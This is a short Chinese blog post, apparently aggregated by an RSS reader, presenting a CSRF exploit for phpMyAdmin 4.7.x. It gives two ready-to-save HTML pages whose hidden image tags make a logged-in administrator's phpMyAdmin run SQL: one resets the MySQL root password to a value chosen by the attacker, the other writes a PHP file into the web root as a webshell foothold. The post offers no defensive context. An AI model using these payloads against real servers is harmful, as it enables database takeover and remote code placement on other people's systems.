phpMyAdmin 4.7.x CSRF 漏洞利用
2018-12-23
·
via Phpmyadmin on 轻风云
修改root密码:
保存为:webshell.html
[HTML]
1
2
|
<p>Hello World</p>
<img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="display:none;" />
|
密码为:www.webshell.cc
写文件
首先你要知道路径
保存为:webshell.html
[Bash shell]
1
2
|
<p>Hello World</p>
<img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';" style="display:none;" />
|
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。